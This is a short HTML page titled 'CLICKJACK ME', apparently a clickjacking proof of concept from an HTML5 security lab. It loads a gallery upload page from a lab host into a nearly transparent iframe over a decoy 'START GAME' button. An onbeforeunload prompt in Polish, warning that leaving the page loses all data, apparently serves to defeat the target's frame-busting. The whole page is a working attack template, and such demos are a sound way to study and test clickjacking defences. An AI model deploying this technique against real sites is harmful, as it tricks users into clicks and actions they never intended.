<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<title>CLICKJACK ME</title>
	<link rel="stylesheet" href="">
</head>
<body>

  <script>window.onbeforeunload = function() {  return 'Czy na pewno chcesz opuścić stronę i stracić wszystkie dane?'}</script>

	<iframe src="http://html5sec.azurewebsites.net/www/upload/galery.php?framebusting=1"
			style="
			height: 400px; 
			width: 600px; 
			opacity: 0.2
	"></iframe>
	<button style="
			height: 30px; 
			position: absolute; 
			top: 115px; 
			left: 230px;
			font-size: x-large;
			z-index: -1;
	">START GAME</button>
</body>
</html>